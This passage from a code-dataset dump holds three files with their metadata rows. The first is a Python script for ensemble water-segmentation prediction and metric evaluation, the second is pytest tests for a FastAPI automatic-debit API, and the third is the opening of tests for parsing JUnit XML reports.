t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub2
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub2_model1'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[1],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub3
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub3_model1'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[2],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
'''model2 预测sub1 sub2 sub3'''
if ifrun[1]:
path_model=path_models+'\\'+models[1]
#加载模型
model.load(path_model)
if config.use_gpu:#使用gpu
model=model.cuda()
#sub1
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub1_model2'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[0],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub2
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub2_model2'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[1],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub3
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub3_model2'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[2],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
'''model3 预测sub1 sub2 sub3'''
if ifrun[2]:
path_model=path_models+'\\'+models[2]
#加载模型
model.load(path_model)
if config.use_gpu:#使用gpu
model=model.cuda()
#sub1
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub1_model3'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[0],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub2
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub2_model3'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[1],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
#sub3
path_predict=path_pre+'\\'+str(n_ite)+'ite'+'\\'+'predict_'+str(n_ite)+'_sub3_model3'
if not os.path.exists(path_predict):
os.makedirs(path_predict)
test_data=WaterDataset(sub=subs[2],train=True,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=config.num_workers)
t=testTools(model=model,data=test_dataloader)
t.predict(path_predict=path_predict)
def segment_merge(n_ite,thre,ifrun):
'''分割+合并
分割 用一定的阈值
合并 赋予每个像素 标签值相加/模型数 比如,有三个模型,某像素有一个模型认为时水(1),另外两个认为是非水体(0),则赋予 (0+0+1)/3
'''
#n_ite=1
path='D:\\result\\train_result\\'+str(n_ite)+'ite'
#thre=[0.31,0.24,0.34]#对应 model1 2 3
if ifrun[0]:
'''sub1'''
name=['predict_'+str(n_ite)+'_sub1_model1' , 'predict_'+str(n_ite)+'_sub1_model2' , 'predict_'+str(n_ite)+'_sub1_model3']
name_to='predict_'+str(n_ite)+'_sub1_merge'
if not os.path.exists(path+'\\'+name_to):
os.makedirs(path+'\\'+name_to)
d=os.listdir(path+'\\'+name[0])
for i in range(len(d)):
if i%100==0:
print(i)
predict1=numpy.array(Image.open(path+'\\'+name[0]+'\\'+d[i]))
predict2=numpy.array(Image.open(path+'\\'+name[1]+'\\'+d[i]))
predict3=numpy.array(Image.open(path+'\\'+name[2]+'\\'+d[i]))
img1=numpy.where(predict1>thre[0],1,0)
img2=numpy.where(predict2>thre[1],1,0)
img3=numpy.where(predict3>thre[2],1,0)
img=(img1+img2+img3)/3
Image.fromarray((img*255).astype(numpy.uint8)).save(path+'\\'+name_to+'\\'+d[i])
if ifrun[1]:
'''sub2'''
name=['predict_'+str(n_ite)+'_sub2_model1' , 'predict_'+str(n_ite)+'_sub2_model2' , 'predict_'+str(n_ite)+'_sub2_model3']
name_to='predict_'+str(n_ite)+'_sub2_merge'
if not os.path.exists(path+'\\'+name_to):
os.makedirs(path+'\\'+name_to)
d=os.listdir(path+'\\'+name[0])
for i in range(len(d)):
if i%100==0:
print(i)
predict1=numpy.array(Image.open(path+'\\'+name[0]+'\\'+d[i]))
predict2=numpy.array(Image.open(path+'\\'+name[1]+'\\'+d[i]))
predict3=numpy.array(Image.open(path+'\\'+name[2]+'\\'+d[i]))
img1=numpy.where(predict1>thre[0],1,0)
img2=numpy.where(predict2>thre[1],1,0)
img3=numpy.where(predict3>thre[2],1,0)
img=(img1+img2+img3)/3
Image.fromarray((img*255).astype(numpy.uint8)).save(path+'\\'+name_to+'\\'+d[i])
if ifrun[2]:
'''sub3'''
name=['predict_'+str(n_ite)+'_sub3_model1' , 'predict_'+str(n_ite)+'_sub3_model2' , 'predict_'+str(n_ite)+'_sub3_model3']
name_to='predict_'+str(n_ite)+'_sub3_merge'
if not os.path.exists(path+'\\'+name_to):
os.makedirs(path+'\\'+name_to)
d=os.listdir(path+'\\'+name[0])
for i in range(len(d)):
if i%100==0:
print(i)
predict1=numpy.array(Image.open(path+'\\'+name[0]+'\\'+d[i]))
predict2=numpy.array(Image.open(path+'\\'+name[1]+'\\'+d[i]))
predict3=numpy.array(Image.open(path+'\\'+name[2]+'\\'+d[i]))
img1=numpy.where(predict1>thre[0],1,0)
img2=numpy.where(predict2>thre[1],1,0)
img3=numpy.where(predict3>thre[2],1,0)
img=(img1+img2+img3)/3
Image.fromarray((img*255).astype(numpy.uint8)).save(path+'\\'+name_to+'\\'+d[i])
def random_labels():
'''对utils里的random_label 的集成
'''
n_ite=1
path='G:\\Graguation\\train_result\\'+str(n_ite)+'ite'
name_from=['predict_'+str(n_ite)+'_sub1_merge','predict_'+str(n_ite)+'_sub2_merge','predict_'+str(n_ite)+'_sub3_merge']
name_to=['predict_'+str(n_ite)+'_sub1_random','predict_'+str(n_ite)+'_sub2_random','predict_'+str(n_ite)+'_sub3_random']
'''sub1'''
util.random_label(path+'\\'+name_from[0],path+'\\'+name_to[0])
'''sub2'''
util.random_label(path+'\\'+name_from[1],path+'\\'+name_to[1])
'''sub3'''
util.random_label(path+'\\'+name_from[2],path+'\\'+name_to[2])
def masks(n_ite,ifrun):
'''对utils里的mask 的集成
'''
#n_ite=1
path='D:\\result\\train_result\\'+str(n_ite)+'ite'
name_from=['predict_'+str(n_ite)+'_sub1_merge','predict_'+str(n_ite)+'_sub2_merge','predict_'+str(n_ite)+'_sub3_merge']
name_to=['predict_'+str(n_ite)+'_sub1_mask_correct','predict_'+str(n_ite)+'_sub2_mask_correct','predict_'+str(n_ite)+'_sub3_mask_correct']
if ifrun[0]:
'''sub1'''
if not os.path.exists(path+'\\'+name_to[0]):
os.makedirs(path+'\\'+name_to[0])
util.mask(path+'\\'+name_from[0],path+'\\'+name_to[0])
if ifrun[1]:
'''sub2'''
if not os.path.exists(path+'\\'+name_to[1]):
os.makedirs(path+'\\'+name_to[1])
util.mask(path+'\\'+name_from[1],path+'\\'+name_to[1])
if ifrun[2]:
'''sub3'''
if not os.path.exists(path+'\\'+name_to[2]):
os.makedirs(path+'\\'+name_to[2])
util.mask(path+'\\'+name_from[2],path+'\\'+name_to[2])
def masks_another(n_ite,ifrun):
'''对utils里的mask_another 的集成
'''
#n_ite=1
path='D:\\result\\train_result\\'+str(n_ite)+'ite'
name_from=['predict_'+str(n_ite)+'_sub1_merge','predict_'+str(n_ite)+'_sub2_merge','predict_'+str(n_ite)+'_sub3_merge']
name_to=['predict_'+str(n_ite)+'_sub1_mask_another','predict_'+str(n_ite)+'_sub2_mask_another','predict_'+str(n_ite)+'_sub3_mask_another']
if ifrun[0]:
'''sub1'''
if not os.path.exists(path+'\\'+name_to[0]):
os.makedirs(path+'\\'+name_to[0])
util.mask_another(path+'\\'+name_from[0],path+'\\'+name_to[0])
if ifrun[1]:
'''sub2'''
if not os.path.exists(path+'\\'+name_to[1]):
os.makedirs(path+'\\'+name_to[1])
util.mask_another(path+'\\'+name_from[1],path+'\\'+name_to[1])
if ifrun[2]:
'''sub3'''
if not os.path.exists(path+'\\'+name_to[2]):
os.makedirs(path+'\\'+name_to[2])
util.mask_another(path+'\\'+name_from[2],path+'\\'+name_to[2])
def merge_mask():
'''utils 里的 masked_label 的集成
'''
n_ite=1
path='G:\\Graguation\\train_result\\'+str(n_ite)+'ite'
name_from=['predict_'+str(n_ite)+'_sub1_merge','predict_'+str(n_ite)+'_sub2_merge','predict_'+str(n_ite)+'_sub3_merge']
name_mask=['predict_'+str(n_ite)+'_sub1_mask','predict_'+str(n_ite)+'_sub2_mask','predict_'+str(n_ite)+'_sub3_mask']
name_to=['predict_'+str(n_ite)+'_sub1_merge_mask','predict_'+str(n_ite)+'_sub2_merge_mask','predict_'+str(n_ite)+'_sub3_merge_mask']
'''sub1'''
util.masked_label(path+'\\'+name_from[0],path+'\\'+name_mask[0],path+'\\'+name_to[0])
'''sub2'''
util.masked_label(path+'\\'+name_from[1],path+'\\'+name_mask[1],path+'\\'+name_to[1])
'''sub3'''
util.masked_label(path+'\\'+name_from[2],path+'\\'+name_mask[2],path+'\\'+name_to[2])
def correct_all(n_ite,ifrun):
'''对utils里的correct_merge 的集成
'''
#n_ite=1
path='D:\\result\\train_result\\'+str(n_ite)+'ite'
name_from=['predict_'+str(n_ite)+'_sub1_merge','predict_'+str(n_ite)+'_sub2_merge','predict_'+str(n_ite)+'_sub3_merge']
name_to=['predict_'+str(n_ite)+'_sub1_correct','predict_'+str(n_ite)+'_sub2_correct','predict_'+str(n_ite)+'_sub3_correct']
if ifrun[0]:
'''sub1'''
if not os.path.exists(path+'\\'+name_to[0]):
os.makedirs(path+'\\'+name_to[0])
correct_merge(path+'\\'+name_from[0],path+'\\'+name_to[0])
if ifrun[1]:
'''sub2'''
if not os.path.exists(path+'\\'+name_to[1]):
os.makedirs(path+'\\'+name_to[1])
correct_merge(path+'\\'+name_from[1],path+'\\'+name_to[1])
if ifrun[2]:
'''sub3'''
if not os.path.exists(path+'\\'+name_to[2]):
os.makedirs(path+'\\'+name_to[2])
correct_merge(path+'\\'+name_from[2],path+'\\'+name_to[2])
def train_test(path_model,path_sta,path_label,path_mask,sub_name,ifboard=config.ifboard):
train(path_model,path_sta,path_label=path_label,path_mask=path_mask,sub_name=sub_name,ifboard=ifboard)
'''模型设置'''
model=getattr(Networks,config.model)(config.input_band,1)#创立网络对象
#加载模型
model.load(path_model)
if config.use_gpu:#使用gpu
model=model.cuda()
'''数据加载'''
transform_img=config.transform_img
transform_label=config.transform_label
test_data=WaterDataset(train=False,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=2)
t=testTools(model=model,data=test_dataloader,path_model=path_model)
#t.predict()
#t.pr(save=save,show=show)
#t.predict(0.24)
#t.getlabel_low_trained(0.48)
#getlabel_low()
p,r,f=t.pr_fmeasure()
pa=t.PA()
iou=t.IoU()
miou=t.MIoU()
aa=t.AA()
#t.drawStatistic()
#p,r,f,pa,iou=t.integrate('F:\\Graduation\\MODELS',['model20','model21','model22','model23'])
l=iou
thre=int(l.argmax())
print('阈值为'+str(thre/100)+'时')
print('precision: '+str(p[thre]))
print('recall: '+str(r[thre]))
print('f measure: '+str(f[thre]))
print('pa: '+str(pa[thre]))
print('iou: '+str(iou[thre]))
print('miou: '+str(miou[thre]))
print('aa: '+str(aa[thre]))
t.recordPrecision(thre/100,p[thre],r[thre],f[thre],pa[thre],iou[thre])
'''
pyplot.plot(f,label='f-measure')
pyplot.plot(pa,label='pa')
pyplot.plot(iou,label='iou')
pyplot.legend()
pyplot.show()
'''
#t.drawStatistic()
return thre/100
def test3(models):
'''模型设置'''
model1=getattr(Networks,config.model)(config.input_band,1)#创立网络对象
model2=getattr(Networks,config.model)(config.input_band,1)#创立网络对象
model3=getattr(Networks,config.model)(config.input_band,1)#创立网络对象
#加载模型
model1.load('D:\\codes\\Graduation\\MODELS\\'+models[0])
model2.load('D:\\codes\\Graduation\\MODELS\\'+models[1])
model3.load('D:\\codes\\Graduation\\MODELS\\'+models[2])
if config.use_gpu:#使用gpu
model1=model1.cuda()
model2=model2.cuda()
model3=model3.cuda()
'''数据加载'''
transform_img=config.transform_img
transform_label=config.transform_label
test_data=WaterDataset(train=False,val=False,transforms_img=transform_img,transforms_label=transform_label)
test_dataloader=DataLoader(test_data,1,
shuffle=True,#每一epoch打乱数据
num_workers=2)
#getsar('G:\\Graguation\\test_result\\sar1','G:\\Graguation\\test_result\\sar2')
#getlabel_low('G:\\Graguation\\test_result\\lowlabel')
t=testTools(model=[model1,model2,model3],data=test_dataloader)
#t.predict()
#t.pr(save=save,show=show)
#t.predict(0.24)
#t.getlabel_low_trained(0.48)
#getlabel_low()
#t.drawStatistic()
p,r,f=t.pr_fmeasure()
pa=t.PA()
iou=t.IoU()
miou=t.MIoU()
aa=t.AA()
#t.drawStatistic()
#p,r,f,pa,iou=t.integrate('F:\\Graduation\\MODELS',['model20','model21','model22','model23'])
l=iou
thre=int(l.argmax())
print('阈值为'+str(thre/100)+'时')
print('precision: '+str(p[thre]))
print('recall: '+str(r[thre]))
print('f measure: '+str(f[thre]))
print('oa: '+str(pa[thre]))
print('iou: '+str(iou[thre]))
print('miou: '+str(miou[thre]))
print('aa: '+str(aa[thre]))
#t.recordPrecision(thre/100,p[thre],r[thre],f[thre],pa[thre],iou[thre])
pyplot.plot(f,label='f-measure')
pyplot.plot(pa,label='pa')
pyplot.plot(iou,label='iou')
pyplot.legend()
pyplot.show()
if __name__=='__main__':
#getlabel_low('D:\\result\\final_result\\labels_low')
test3(['model67','model68','model69'])
#util.segment('D:\\result\\final_result\\predicts','D:\\result\\final_result\\segments',0.38)
#getimg()
#ifrun=[True,False,False]
#ifrun=[False,True,False]
#ifrun=[False,False,True]
#ifrun=[True,True,True]
#n_ite=2
#predict_all(['model19','model20','model21'],n_ite,ifrun)
#predict_all(['model4','model5','model6'],2,[False,True,False])
#predict_all(['model4','model5','model6'],2,[False,False,True])
#segment_merge(4,[0.38,0.37,0.24],[True,True,True])
#masks_another(4,[True,True,True])
#correct_all(1,ifrun)
#predict_seg_merge_mask(['model43','model44','model45'],n_ite,[0.03,0.04,0.2])
#segment_merge()
#random_labels()
#masks()
#train_test()
'''
from multiprocessing import Process
t1=time.time()
p1 = Process(target=predict_all, args=(['model40','model41','model42'],n_ite,[False,False,True],))
p2 = Process(target=predict_all, args=(['model40','model41','model42'],n_ite,[False,True,False],))
p3 = Process(target=predict_all, args=(['model40','model41','model42'],n_ite,[True,False,False],))
p1.start()
p2.start()
p3.start()
p1.join()
p2.join()
p3.join()
t2=time.time()
print((t2-t1)/60)
t1=time.time()
p1 = Process(target=segment_merge, args=(n_ite,[0.15,0.07,0.06],[False,False,True],))
p2 = Process(target=segment_merge, args=(n_ite,[0.15,0.07,0.06],[False,True,False],))
p3 = Process(target=segment_merge, args=(n_ite,[0.15,0.07,0.06],[True,False,False],))
p1.start()
p2.start()
p3.start()
p1.join()
p2.join()
p3.join()
t2=time.time()
print((t2-t1)/60)
t1=time.time()
p1 = Process(target=correct_all, args=(n_ite,[False,False,True],))
p2 = Process(target=correct_all, args=(n_ite,[False,True,False],))
p3 = Process(target=correct_all, args=(n_ite,[True,False,False],))
p1.start()
p2.start()
p3.start()
p1.join()
p2.join()
p3.join()
t2=time.time()
print((t2-t1)/60)
t1=time.time()
p1 = Process(target=masks, args=(n_ite,[False,False,True],))
p2 = Process(target=masks, args=(n_ite,[False,True,False],))
p3 = Process(target=masks, args=(n_ite,[True,False,False],))
p1.start()
p2.start()
p3.start()
p1.join()
p2.join()
p3.join()
t2=time.time()
print((t2-t1)/60)
'''
#predict_seg_merge_mask(['model61','model62','model63'],3,[0.09,0.15,0.14],ifrun=[False,True,True])
'''
models=['67','68','69']
n_ite_train=5
path_model='D:\\codes\\Graduation\\MODELS\\model'+models[0]
path_sta='D:\\codes\\Graduation\\MODELS\\sta'+models[0]
path_label='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub1_merge'
path_mask='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub1_mask'
sub_name='train_sub1'
util.changename(path_label,'label')
util.changename(path_mask,'label')
t1=train_test(path_model,path_sta,path_label,path_mask,sub_name)
path_model='D:\\codes\\Graduation\\MODELS\\model'+models[1]
path_sta='D:\\codes\\Graduation\\MODELS\\sta'+models[1]
path_label='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub2_merge'
path_mask='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub2_mask'
sub_name='train_sub2'
util.changename(path_label,'label')
util.changename(path_mask,'label')
t2=train_test(path_model,path_sta,path_label,path_mask,sub_name)
path_model='D:\\codes\\Graduation\\MODELS\\model'+models[2]
path_sta='D:\\codes\\Graduation\\MODELS\\sta'+models[2]
path_label='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub3_merge'
path_mask='D:\\result\\train_result\\'+str(n_ite_train-1)+'ite\\predict_'+str(n_ite_train-1)+'_sub3_mask'
sub_name='train_sub3'
util.changename(path_label,'label')
util.changename(path_mask,'label')
t3=train_test(path_model,path_sta,path_label,path_mask,sub_name)
#predict_seg_merge_mask(['model'+models[0],'model'+models[1],'model'+models[2]],n_ite_train,[t1,t2,t3])
'''
| 37.695364 | 145 | 0.618693 | 3,978 | 28,460 | 4.208648 | 0.061337 | 0.030821 | 0.041393 | 0.055191 | 0.880182 | 0.86943 | 0.82523 | 0.79196 | 0.769502 | 0.750567 | 0 | 0.032939 | 0.191427 | 28,460 | 754 | 146 | 37.745358 | 0.694594 | 0.076212 | 0 | 0.763547 | 0 | 0 | 0.096222 | 0.016269 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024631 | false | 0 | 0.039409 | 0 | 0.066502 | 0.054187 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6da251f25c0b280193936e968d579eef17454d53 | 4,543 | py | Python | backend/app/tests/api/api_v1/test_debit.py | ralphribeiro/debito_automatico | 689a1cb70394d6bafcf8eb0be963b3b586d4556f | [
"MIT"
] | null | null | null | backend/app/tests/api/api_v1/test_debit.py | ralphribeiro/debito_automatico | 689a1cb70394d6bafcf8eb0be963b3b586d4556f | [
"MIT"
] | null | null | null | backend/app/tests/api/api_v1/test_debit.py | ralphribeiro/debito_automatico | 689a1cb70394d6bafcf8eb0be963b3b586d4556f | [
"MIT"
] | null | null | null | from fastapi.testclient import TestClient
from sqlalchemy.orm import Session
from app.core import config
from app.tests.utils.debit import create_debit_request
"""
[x] - Autenticação e acesso a plataforma
Um usuário autenticado,
[x] - solicita uma ativação de débito automático
[x] - cancela uma solicitação de ativação (super user)
[x] - aprova uma solicitação de ativação (super user)
[x] - rejeita uma solicitação de ativação (super user)
[x] - visualiza uma solicitação
"""
def test_request_automatic_debit(client: TestClient,
normal_random_user_token_headers: dict,
db: Session):
res = client.get(f"{config.API_V1_STR}/debits/request",
headers=normal_random_user_token_headers)
assert res.status_code == 200
def test_cancel_request_automatic_debit_with_super_user(
client: TestClient,
superuser_token_headers: dict,
db: Session
):
status_in = "canceled"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=superuser_token_headers
)
assert res.status_code == 200
data = res.json()
assert data["status"] == status_in
def test_cancel_request_automatic_debit_with_normal_user(
client: TestClient,
normal_user_token_headers: dict,
db: Session
):
status_in = "canceled"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=normal_user_token_headers
)
assert res.status_code == 400
def test_approve_request_automatic_debit_with_super_user(
client: TestClient,
superuser_token_headers: dict,
db: Session
):
status_in = "approved"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=superuser_token_headers
)
assert res.status_code == 200
data = res.json()
assert data["status"] == status_in
def test_approve_request_automatic_debit_with_normal_user(
client: TestClient,
normal_user_token_headers: dict,
db: Session
):
status_in = "canceled"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=normal_user_token_headers
)
assert res.status_code == 400
def test_reject_request_automatic_debit_with_super_user(
client: TestClient,
superuser_token_headers: dict,
db: Session
):
status_in = "rejected"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=superuser_token_headers
)
assert res.status_code == 200
data = res.json()
assert data["status"] == status_in
def test_reject_request_automatic_debit_with_normal_user(
client: TestClient,
normal_user_token_headers: dict,
db: Session
):
status_in = "rejected"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=normal_user_token_headers
)
assert res.status_code == 400
def test_invalid_status_request_automatic_debit_with_super_user(
client: TestClient,
superuser_token_headers: dict,
db: Session
):
status_in = "papibaquigrafo"
debit = create_debit_request(db)
res = client.put(
f"{config.API_V1_STR}/debits/{debit.owner_id}?status={status_in}",
headers=superuser_token_headers
)
assert res.status_code == 422
def test_get_request_automatic_debit(
client: TestClient,
normal_random_user_token_headers: dict,
superuser_token_headers: dict,
db: Session
):
res = client.get(f"{config.API_V1_STR}/debits/request",
headers=normal_random_user_token_headers)
assert res.status_code == 200
data = res.json()
status_in = "approved"
res2 = client.put(
f"{config.API_V1_STR}/debits/{data['id']}?status={status_in}",
headers=superuser_token_headers
)
assert res2.status_code == 200
data2 = res2.json()
assert data2["status"] == status_in
res3 = client.get(f"{config.API_V1_STR}/debits/{data2['owner_id']}",
headers=normal_random_user_token_headers)
assert res3.status_code == 200
data3 = res3.json()
assert data2["id"] == data3["id"]
| 28.572327 | 74 | 0.686771 | 587 | 4,543 | 4.988075 | 0.136286 | 0.086066 | 0.057377 | 0.045082 | 0.839822 | 0.839822 | 0.836749 | 0.772541 | 0.752049 | 0.734973 | 0 | 0.015664 | 0.213075 | 4,543 | 158 | 75 | 28.753165 | 0.803357 | 0 | 0 | 0.731707 | 0 | 0 | 0.167619 | 0.144286 | 0 | 0 | 0 | 0 | 0.130081 | 1 | 0.073171 | false | 0 | 0.03252 | 0 | 0.105691 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6dc572f5bfab917693c374ac3a4306b3eecdbcdc | 7,372 | py | Python | tests/unit/test_reportlib.py | boxingbeetle/softfab | 0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14 | [
"BSD-3-Clause"
] | 20 | 2019-02-07T17:03:04.000Z | 2020-03-16T20:45:19.000Z | tests/unit/test_reportlib.py | boxingbeetle/softfab | 0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14 | [
"BSD-3-Clause"
] | 36 | 2019-02-11T08:57:16.000Z | 2020-09-29T05:32:08.000Z | tests/unit/test_reportlib.py | boxingbeetle/softfab | 0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14 | [
"BSD-3-Clause"
] | null | null | null | # SPDX-License-Identifier: BSD-3-Clause
from io import StringIO
from softfab.reportlib import parseReport
from softfab.resultcode import ResultCode
def testParsePytestEmpty():
"""Parse a report from pytest that contains no test cases."""
xml = '''
<?xml version="1.0" encoding="utf-8"?>
<testsuites>
<testsuite errors="0" failures="0" hostname="hyperion" name="pytest" skipped="0" tests="0" time="0.569" timestamp="2020-08-14T01:10:52.311169"/>
</testsuites>
'''.lstrip()
report = parseReport(lambda: StringIO(xml), 'report.xml')
assert report is not None
assert report.errors == 0
assert report.failures == 0
assert report.skipped == 0
assert report.numTestcases == 0
assert report.result is ResultCode.CANCELLED
assert report.summary == 'no test cases found'
data = report.data
assert data['testcases'] == '0'
assert data['checks'] == '0'
assert data['failures'] == '0'
assert data['errors'] == '0'
assert data['skipped'] == '0'
assert len(report.testsuite) == 1
suite, = report.testsuite
assert suite.tests == 0
assert suite.failures == 0
assert suite.errors == 0
assert suite.skipped == 0
assert suite.time == 0.569
assert suite.result is ResultCode.CANCELLED
assert not suite.testcase
def testParsePytestAllPass():
"""Parse a report from pytest where all tests pass."""
xml = '''
<?xml version="1.0" encoding="utf-8"?>
<testsuites>
<testsuite errors="0" failures="0" hostname="hyperion" name="pytest" skipped="0" tests="3" time="1.234" timestamp="2020-08-13T13:03:59.945171">
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[Database]" time="0.216"/>
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[VersionedDatabase]" time="0.001"/>
<testcase classname="test_databaselib" file="test_databaselib.py" line="338" name="testMixedRandom" time="0.749">
<system-out>Random seed: 1597316644
</system-out>
</testcase>
</testsuite>
</testsuites>
'''.lstrip()
report = parseReport(lambda: StringIO(xml), 'report.xml')
assert report is not None
assert report.errors == 0
assert report.failures == 0
assert report.skipped == 0
assert report.numTestcases == 3
assert report.result is ResultCode.OK
assert report.summary == '0 failed'
data = report.data
assert data['testcases'] == '3'
assert data['checks'] == '3'
assert data['failures'] == '0'
assert data['errors'] == '0'
assert data['skipped'] == '0'
assert len(report.testsuite) == 1
suite, = report.testsuite
assert suite.tests == 3
assert suite.failures == 0
assert suite.errors == 0
assert suite.skipped == 0
assert suite.time == 1.234
assert suite.result is ResultCode.OK
assert len(suite.testcase) == 3
for case in suite.testcase:
assert case.result is ResultCode.OK
assert not case.error
assert not case.failure
assert not case.skipped
def testParsePytestSomeFail():
"""Parse a report from pytest where some tests fail."""
xml = '''
<?xml version="1.0" encoding="utf-8"?>
<testsuites>
<testsuite errors="0" failures="1" hostname="hyperion" name="pytest" skipped="0" tests="3" time="1.234" timestamp="2020-08-13T13:03:59.945171">
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[Database]" time="0.216"/>
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[VersionedDatabase]" time="0.001"/>
<testcase classname="test_joblib.TestJobs" file="test_joblib.py" line="444" name="test0110TRSetRandomRun" time="0.000">
<failure message="RuntimeError: forced">self = <test_joblib.TestJobs testMethod=test0110TRSetRandomRun>
def setUp(self):
> raise RuntimeError('forced')
E RuntimeError: forced
test_joblib.py:45: RuntimeError</failure>
</testcase>
</testsuite>
</testsuites>
'''.lstrip()
report = parseReport(lambda: StringIO(xml), 'report.xml')
assert report is not None
assert report.errors == 0
assert report.failures == 1
assert report.skipped == 0
assert report.numTestcases == 3
assert report.result is ResultCode.WARNING
assert report.summary == '1 failed'
data = report.data
assert data['testcases'] == '3'
assert data['checks'] == '3'
assert data['failures'] == '1'
assert data['errors'] == '0'
assert data['skipped'] == '0'
assert len(report.testsuite) == 1
suite, = report.testsuite
assert suite.tests == 3
assert suite.failures == 1
assert suite.errors == 0
assert suite.skipped == 0
assert suite.time == 1.234
assert suite.result is ResultCode.WARNING
assert len(suite.testcase) == 3
for index, case in enumerate(suite.testcase):
if index == 2:
assert case.result is ResultCode.WARNING
assert case.failure
else:
assert case.result is ResultCode.OK
assert not case.failure
assert not case.error
assert not case.skipped
def testParsePytestSomeSkipped():
"""Parse a report from pytest where some tests were skipped."""
xml = '''
<?xml version="1.0" encoding="utf-8"?>
<testsuites>
<testsuite errors="0" failures="0" hostname="hyperion" name="pytest" skipped="1" tests="3" time="1.234" timestamp="2020-08-13T13:03:59.945171">
<testcase classname="test_databaselib" file="test_databaselib.py" line="117" name="testEmpty[Database]" time="0.216"/>
